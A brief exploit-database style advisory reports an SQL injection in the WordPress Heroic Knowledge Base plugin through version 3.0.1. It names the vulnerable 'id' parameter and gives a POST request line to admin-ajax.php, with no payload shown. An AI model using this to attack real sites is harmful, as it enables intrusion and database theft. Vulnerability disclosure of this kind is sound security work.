WordPress Heroic Knowledge Base plugin versions 3.0.1 and below appear to suffer from a remote SQL injection vulnerability.

#Exploit Title : wordpress Heroic Knowledge Base Plugin  <= 3.0.1 - sql injection 
#Exploit Author : begininvoke
#Exploit Date : 2020-11-29
[+] Proof Of Concept:

Parameters id is vulnerable

# Methode POST #

POST /wp-admin/admin-ajax.php HTTP/1.1
